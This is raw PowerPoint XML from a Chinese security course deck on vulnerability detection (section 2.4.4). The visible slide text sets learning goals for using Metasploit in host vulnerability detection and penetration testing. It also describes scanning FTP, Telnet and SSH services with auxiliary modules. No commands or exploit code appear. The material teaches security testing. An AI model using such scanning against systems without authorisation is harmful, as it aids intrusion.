              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="9716135" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.掌握使用Metasploit工具对主机进行漏洞检测的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.掌握使用Metasploit工具对主机进行渗透测试的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551305" y="1825625"/>
            <a:ext cx="8547735" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>使用Metasploit工具能够检测校园内办公计算机当前的服务版本信息，并检查其是否存在常见漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="5959255" y="1280795"/>
            <a:ext cx="4070985" cy="2908300"/>
            <a:chOff x="6387147" y="1859239"/>
            <a:chExt cx="4455396" cy="2908300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="3899427" cy="2908300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>针对目标主机中开放的服务，使用Metasploit工具的辅助扫描模块对当前的FTP、Telnet、SSH等服务进行扫描，可以检测是否存在常见漏洞。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1136650"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1136650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="922020"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
